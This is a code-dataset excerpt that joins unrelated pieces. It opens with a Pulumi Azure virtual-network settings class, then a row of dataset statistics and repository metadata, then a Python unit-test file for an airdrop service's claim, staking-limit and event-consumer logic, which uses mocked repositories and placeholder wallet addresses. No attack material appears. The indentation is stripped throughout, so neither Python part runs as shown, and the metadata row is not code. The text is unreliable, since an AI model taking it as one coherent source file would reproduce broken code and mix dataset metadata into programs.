class VirtualNetworkResourceSettingsArgs:
def __init__(__self__, *,
resource_type: pulumi.Input[str],
target_resource_name: pulumi.Input[str],
address_space: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_ddos_protection: Optional[pulumi.Input[bool]] = None,
subnets: Optional[pulumi.Input[Sequence[pulumi.Input['SubnetResourceSettingsArgs']]]] = None):
"""
Defines the virtual network resource settings.
:param pulumi.Input[str] resource_type: The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/virtualNetworks'.
:param pulumi.Input[str] target_resource_name: Gets or sets the target Resource name.
:param pulumi.Input[Sequence[pulumi.Input[str]]] address_space: Gets or sets the address prefixes for the virtual network.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: Gets or sets DHCPOptions that contains an array of DNS servers available to VMs
deployed in the virtual network.
:param pulumi.Input[bool] enable_ddos_protection: Gets or sets a value indicating whether gets or sets whether the
DDOS protection should be switched on.
:param pulumi.Input[Sequence[pulumi.Input['SubnetResourceSettingsArgs']]] subnets: Gets or sets List of subnets in a VirtualNetwork.
"""
pulumi.set(__self__, "resource_type", 'Microsoft.Network/virtualNetworks')
pulumi.set(__self__, "target_resource_name", target_resource_name)
if address_space is not None:
pulumi.set(__self__, "address_space", address_space)
if dns_servers is not None:
pulumi.set(__self__, "dns_servers", dns_servers)
if enable_ddos_protection is not None:
pulumi.set(__self__, "enable_ddos_protection", enable_ddos_protection)
if subnets is not None:
pulumi.set(__self__, "subnets", subnets)
@property
@pulumi.getter(name="resourceType")
def resource_type(self) -> pulumi.Input[str]:
"""
The resource type. For example, the value can be Microsoft.Compute/virtualMachines.
Expected value is 'Microsoft.Network/virtualNetworks'.
"""
return pulumi.get(self, "resource_type")
@resource_type.setter
def resource_type(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_type", value)
@property
@pulumi.getter(name="targetResourceName")
def target_resource_name(self) -> pulumi.Input[str]:
"""
Gets or sets the target Resource name.
"""
return pulumi.get(self, "target_resource_name")
@target_resource_name.setter
def target_resource_name(self, value: pulumi.Input[str]):
pulumi.set(self, "target_resource_name", value)
@property
@pulumi.getter(name="addressSpace")
def address_space(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Gets or sets the address prefixes for the virtual network.
"""
return pulumi.get(self, "address_space")
@address_space.setter
def address_space(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "address_space", value)
@property
@pulumi.getter(name="dnsServers")
def dns_servers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Gets or sets DHCPOptions that contains an array of DNS servers available to VMs
deployed in the virtual network.
"""
return pulumi.get(self, "dns_servers")
@dns_servers.setter
def dns_servers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dns_servers", value)
@property
@pulumi.getter(name="enableDdosProtection")
def enable_ddos_protection(self) -> Optional[pulumi.Input[bool]]:
"""
Gets or sets a value indicating whether gets or sets whether the
DDOS protection should be switched on.
"""
return pulumi.get(self, "enable_ddos_protection")
@enable_ddos_protection.setter
def enable_ddos_protection(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_ddos_protection", value)
@property
@pulumi.getter
def subnets(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SubnetResourceSettingsArgs']]]]:
"""
Gets or sets List of subnets in a VirtualNetwork.
"""
return pulumi.get(self, "subnets")
@subnets.setter
def subnets(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SubnetResourceSettingsArgs']]]]):
pulumi.set(self, "subnets", value)
| 42.707547 | 579 | 0.675035 | 8,813 | 76,959 | 5.69284 | 0.038806 | 0.098005 | 0.080365 | 0.047358 | 0.879911 | 0.817424 | 0.769468 | 0.690837 | 0.654482 | 0.612465 | 0 | 0.000752 | 0.222157 | 76,959 | 1,801 | 580 | 42.73126 | 0.837359 | 0.269728 | 0 | 0.562985 | 1 | 0 | 0.174531 | 0.097249 | 0 | 0 | 0 | 0 | 0 | 1 | 0.210271 | false | 0 | 0.005814 | 0 | 0.334302 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
4203372672fd1f953102458a86d8342c87caa1c6 | 32,867 | py | Python | airdrop/testcases/unit_testcases/test_airdrop_claims.py | raamb/airdrop-services | f386dc6f3f8e1633d1c27d014c4a4483870b79ed | [
"MIT"
] | null | null | null | airdrop/testcases/unit_testcases/test_airdrop_claims.py | raamb/airdrop-services | f386dc6f3f8e1633d1c27d014c4a4483870b79ed | [
"MIT"
] | null | null | null | airdrop/testcases/unit_testcases/test_airdrop_claims.py | raamb/airdrop-services | f386dc6f3f8e1633d1c27d014c4a4483870b79ed | [
"MIT"
] | null | null | null | import unittest
from unittest import TestCase
from unittest.mock import Mock, patch
from airdrop.application.services.airdrop_services import AirdropServices
from http import HTTPStatus
from airdrop.constants import AirdropClaimStatus
from airdrop.infrastructure.repositories.airdrop_repository import AirdropRepository
from airdrop.infrastructure.models import AirdropWindow, Airdrop
from datetime import datetime, timedelta
from airdrop.application.services.user_registration_services import \
UserRegistrationServices
class AirdropClaims(TestCase):
airdrop_id = None
airdrop_window_id = None
def setUp(self):
org_name = 'SINGNET'
token_name = 'AGIX'
token_type = 'CONTRACT'
portal_link = 'https://ropsten-airdrop.singularitynet.io/'
documentation_link = 'https://ropsten-airdrop.singularitynet.io/'
description = 'This is a test airdrop'
github_link = 'https://github.com/singnet/airdrop-services'
registration_start_date = datetime.utcnow() - timedelta(days=2)
registration_end_date = datetime.utcnow() + timedelta(days=30)
claim_start_date = datetime.utcnow() - timedelta(days=2)
claim_end_date = datetime.utcnow() + timedelta(days=30)
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
user_address = '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8'
token_name = 'AGIX'
occam_contract_address = '0x6e94577b949a56279637ff74dfcff2c28408f049'
occam_token_address = '0x5e93577b949a56279637ff74dfcff2c28408f049'
occam_user_address = '0xEA6741dDe714fd979de3EdF0F56AA9716B898ec8'
occam_token_name = 'AGIX'
airdrop_repository = AirdropRepository()
airdrop = airdrop_repository.register_airdrop(
token_address, org_name, token_name, token_type, contract_address, portal_link, documentation_link, description, github_link)
airdrop_windows = airdrop_repository.register_airdrop_window(airdrop_id=airdrop.id, airdrop_window_name='Airdrop Window 1', description='Long description', registration_required=True,
registration_start_period=registration_start_date, registration_end_period=registration_end_date, snapshot_required=True, claim_start_period=claim_start_date, claim_end_period=claim_end_date, total_airdrop_tokens=1000000)
global airdrop_id
airdrop_id = airdrop.id
global airdrop_window_id
airdrop_window_id = airdrop_windows.id
nunet_occam_airdrop = airdrop_repository.register_airdrop(
occam_token_address, org_name, token_name, token_type, contract_address, portal_link, documentation_link, description, github_link)
airdrop_repository.register_airdrop_window(airdrop_id=nunet_occam_airdrop.id, airdrop_window_name='Occam Window 1', description='Long description', registration_required=True,
registration_start_period=registration_start_date, registration_end_period=registration_end_date, snapshot_required=True, claim_start_period=claim_start_date, claim_end_period=claim_end_date, total_airdrop_tokens=1000000)
@patch('common.utils.recover_address')
@patch('airdrop.infrastructure.repositories.user_repository.UserRepository.check_rewards_awarded')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_signature_for_airdrop_window_id')
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.is_claimed_airdrop_window')
def test_get_signature_for_airdrop_window_claim(self, mock_is_claimed_airdrop_window, mock_get_airdrop_window_claimable_info, mock_get_signature_for_airdrop_window_id, mock_check_rewards_awarded, mock_recover_address):
address = '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8'
airdrop_claim_signature = '958449C28930970989dB5fFFbEdd9F44989d33a958B5fF989dB5f33a958F'
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
mock_is_claimed_airdrop_window.return_value = {}
mock_check_rewards_awarded.return_value = True, 1000
mock_get_signature_for_airdrop_window_id.return_value = airdrop_claim_signature
mock_get_airdrop_window_claimable_info.return_value = 100, address, contract_address, token_address,\
staking_contract_address,0
mock_recover_address.return_value = address
mock_check_rewards_awarded.value = True, 1000
user_registration_payload = {
"airdrop_window_id": str(airdrop_window_id),
"airdrop_id": str(airdrop_id),
"address": address,
"signature": "958449C28930970989dB5fFFbEdd9F44989d33a958B5fF989dB5f33a958F",
}
UserRegistrationServices().register(user_registration_payload)
payload = {
"address": address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_response = {'airdrop_id': str(airdrop_id), 'airdrop_window_id': str(airdrop_window_id),
'user_address': '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8',
'signature': '958449C28930970989dB5fFFbEdd9F44989d33a958B5fF989dB5f33a958F',
'claimable_amount': str(100),
'contract_address': '0x5e94577b949a56279637ff74dfcff2c28408f049',
'staking_contract_address': '0x5e94577b949a56279637ff74dfcff2c28408f049',
'token_address': '0x5e94577b949a56279637ff74dfcff2c28408f049',
'total_eligibility_amount':str(0)}
status_code, result = AirdropServices().airdrop_window_claims(payload)
self.assertEqual(expected_response, result)
def test_get_signature_for_airdrop_window_claim_with_invalid_windows(self):
payload = {
"address": "0x176133a958449C28930970989dB5fFFbEdd9F442",
"airdrop_id": airdrop_id,
"airdrop_window_id": airdrop_window_id
}
status_code, result = AirdropServices().airdrop_window_claims(payload)
self.assertNotEqual(status_code, HTTPStatus.OK)
def test_airdrop_window_claim_txn_status(self):
payload = {
"address": "0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8",
"airdrop_id": airdrop_id,
"airdrop_window_id": airdrop_window_id,
"txn_status": "SUCCESS",
"txn_hash": "0xcb2ce8ea4749f58f0ea3cee7b5ed7686c67ccd1179dd526e080d6aa7fde69f70",
"amount": "100"
}
status_code, result = AirdropServices().airdrop_window_claim_status(payload)
self.assertEqual(status_code, HTTPStatus.BAD_REQUEST)
def test_airdrop_window_claim_duplicate_txn_status(self):
payload = {
"address": "0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8",
"airdrop_id": "1",
"airdrop_window_id": "1",
"txn_status": "SUCCESS",
"txn_hash": "0xcb2ce8ea4749f58f0ea3cee7b5ed7686c67ccd1179dd526e080d6aa7fde69f70",
"amount": "100"
}
status_code, result = AirdropServices().airdrop_window_claim_status(payload)
self.assertEqual(status_code, HTTPStatus.BAD_REQUEST.value)
def test_airdrop_window_claim_history(self):
payload = {
"address": "0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8",
"airdrop_id": "1"
}
status_code, result = AirdropServices().airdrop_window_claim_history(payload)
self.assertEqual(status_code, HTTPStatus.OK.value)
def test_airdrop_window_claim_history(self):
payload = {
"address": "0x176133a958449C28930970989dB5fFFbEdd9F417",
"airdrop_id": "1",
"airdrop_window_id": "1"
}
status_code, result = AirdropServices().airdrop_window_claim_history(payload)
result_length = len(result['claim_history'])
self.assertEqual(result_length, 0)
def test_airdrop_event_consumer(self):
payload = {
"transactionHash": "0x176133a958449C28930970989dB5fFFbEdd9F417",
"json_str": "{'authorizer': '0xD93209FDC420e8298bDFA3dBe340F366Faf1E7bc', 'claimer': '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8', 'amount': 100, 'airDropId': 1, 'airDropWindowId': 1}",
"event": "Claim"
}
event = {"data": payload}
status, response = AirdropServices().airdrop_event_consumer(event)
self.assertEqual(status, HTTPStatus.OK)
self.assertEqual(response, {})
def test_airdrop_event_consumer_with_duplicate_data(self):
payload = {
"transactionHash": "0x176133a958449C28930970989dB5fFFbEdd9F417",
"json_str": "{'authorizer': '0xD93209FDC420e8298bDFA3dBe340F366Faf1E7bc', 'claimer': '0xEA674fdDe714fd979de3EdF0F56AA9716B898ec8', 'amount': 100, 'airDropId': 1, 'airDropWindowId': 1}",
"event": "Claim"
}
event = {"data": payload}
status, response = AirdropServices().airdrop_event_consumer(event)
self.assertNotEqual(response, False)
def test_airdrop_event_consumer_with_invalid_event(self):
payload = {
"transactionHash": "0x176133a958449C28930970989dB5fFFbEdd9F417",
"json_str": "{'conversionAuthorizer': '0xD93209FDC420e8298bDFA3dBe340F366Faf1E7bc'}",
"event": "NewAuthorizer"
}
event = {"data": payload}
status, response = AirdropServices().airdrop_event_consumer(event)
self.assertEqual(response, "Unsupported event")
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_by_sending_full_rewards_to_wallet_if_stake_window_is_not_open(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = False
is_user_can_stake = True
window_max_stake = 100000
window_stake_amount = 200
max_stakable_amount = 10000
already_staked_amount = 0
airdrop_rewards = 20000
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount,window_max_stake,window_stake_amount
mock_get_stake_details_of_address.return_value = is_user_can_stake, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, \
contract_address, token_address, staking_contract_address,0
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(airdrop_rewards),
"stakable_tokens": str(0),
"is_stakable": False,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount": str(0)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_by_sending_full_rewards_to_wallet_as_user_exceeded_the_stake_limit(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_user_can_stake = True
window_max_stake = 100000
window_stake_amount = 200
max_stakable_amount = 10000
already_staked_amount = max_stakable_amount
airdrop_rewards = 20000
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount,window_max_stake,window_stake_amount
mock_get_stake_details_of_address.return_value = is_user_can_stake, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, contract_address, token_address, staking_contract_address,0
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(airdrop_rewards),
"stakable_tokens": str(0),
"is_stakable": False,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount": str(0)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_by_partially_stake_and_claim(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_user_can_stake = True
window_max_stake = 100000
window_stake_amount = 200
max_stakable_amount = 10000
already_staked_amount = 5000
airdrop_rewards = 10000
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount,window_max_stake,window_stake_amount
mock_get_stake_details_of_address.return_value = is_user_can_stake, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, contract_address, token_address, staking_contract_address,0
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(5000),
"stakable_tokens": str(5000),
"is_stakable": True,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount": str(0)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_by_full_rewards_staked(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_user_can_stake = True
window_max_stake = 100000
window_stake_amount = 200
max_stakable_amount = 10000
already_staked_amount = 0
airdrop_rewards = 10000
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount,window_max_stake,\
window_stake_amount
mock_get_stake_details_of_address.return_value = is_user_can_stake, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address,\
contract_address, token_address, staking_contract_address,airdrop_rewards
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": "0",
"stakable_tokens": str(airdrop_rewards),
"is_stakable": True,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount":str(airdrop_rewards)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_if_airdrop_rewards_greater_than_max_stake_amount(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_user_can_stake = True
window_max_stake = 100000
window_stake_amount = 200
max_stakable_amount = 10000
already_staked_amount = 0
airdrop_rewards = 50000
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount,window_max_stake,window_stake_amount
mock_get_stake_details_of_address.return_value = is_user_can_stake, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, contract_address, token_address, staking_contract_address,airdrop_rewards
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(40000),
"stakable_tokens": str(10000),
"is_stakable": True,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount": str(airdrop_rewards)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_user_can_stake_who_has_not_staked(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_already_staked_user = False
window_max_stake = 100000
window_stake_amount = 200
max_stakable_amount = 10000
already_staked_amount = 0
airdrop_rewards = 10000
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount,window_max_stake,window_stake_amount
mock_get_stake_details_of_address.return_value = is_already_staked_user, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, contract_address,\
token_address, staking_contract_address,0
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(0),
"stakable_tokens": str(10000),
"is_stakable": True,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount": str(0)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_if_user_staked_max_amount_then_is_stakable_should_false(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_already_staked_user = True
window_max_stake = 100000
window_stake_amount = 200
max_stakable_amount = 10000
already_staked_amount = 10000
airdrop_rewards = 1000
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount,window_max_stake,window_stake_amount
mock_get_stake_details_of_address.return_value = is_already_staked_user, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, contract_address, \
token_address, staking_contract_address,0
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(airdrop_rewards),
"stakable_tokens": str(0),
"is_stakable": False,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount": str(0)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_window_stake_details_on_window_limit(self, mock_get_stake_details_of_address, mock_get_stake_window_details, mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_user_can_stake = True
window_max_stake = 10
window_stake_amount = 9
# => only 1 can be staked by any user
max_stakable_amount = 5
already_staked_amount = 1
airdrop_rewards = 4
# => ideally user can stake 4 if others had not staked,
# but since the window has been filled by other users, this user can stake NOW only 1
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount,window_max_stake, \
window_stake_amount
mock_get_stake_details_of_address.return_value = is_user_can_stake, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, \
contract_address, token_address, staking_contract_address,airdrop_rewards
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(airdrop_rewards - min((window_max_stake - window_stake_amount),(max_stakable_amount-already_staked_amount))),
"stakable_tokens": str(window_max_stake - window_stake_amount),
"is_stakable": True,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount":str(airdrop_rewards)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
@patch('airdrop.infrastructure.repositories.airdrop_repository.AirdropRepository.get_airdrop_window_claimable_info')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_window_details')
@patch('airdrop.application.services.airdrop_services.AirdropServices.get_stake_details_of_address')
def test_get_airdrop_for_erroneous_stake_window(self, mock_get_stake_details_of_address,
mock_get_stake_window_details,
mock_get_airdrop_window_claimable_info):
user_wallet_address = "0x46EF7d49aaA68B29C227442BDbD18356415f8304"
contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
token_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
staking_contract_address = '0x5e94577b949a56279637ff74dfcff2c28408f049'
is_stake_window_open = True
is_user_can_stake = True
window_max_stake = 10
window_stake_amount = 9
# => only 1 can be staked by any user
max_stakable_amount = 5
# the amount already staked by this user is higher than the max limits
already_staked_amount = 13
airdrop_rewards = 4
# => ideally user can stake 4 if others had not staked,
# but since the window has been filled by other users, this user can stake NOW only 1
mock_get_stake_window_details.return_value = is_stake_window_open, max_stakable_amount, window_max_stake, \
window_stake_amount
mock_get_stake_details_of_address.return_value = is_user_can_stake, already_staked_amount
mock_get_airdrop_window_claimable_info.return_value = airdrop_rewards, user_wallet_address, \
contract_address, token_address, staking_contract_address, \
airdrop_rewards
event = {
"address": user_wallet_address,
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id)
}
expected_result = {
"stake_details": {
"airdrop_id": str(airdrop_id),
"airdrop_window_id": str(airdrop_window_id),
"address": user_wallet_address,
"claimable_tokens_to_wallet": str(airdrop_rewards),
"stakable_tokens": str(0),
"is_stakable": False,
"token_name": "AGIX",
"airdrop_rewards": str(airdrop_rewards),
"total_eligible_amount": str(airdrop_rewards)
}
}
status_code, response = AirdropServices().get_airdrop_window_stake_details(event)
self.assertEqual(response, expected_result)
self.assertEqual(status_code, HTTPStatus.OK.value)
def test_airdrop_txn_watcher(self):
response = AirdropServices().airdrop_txn_watcher()
self.assertEqual(response, None)
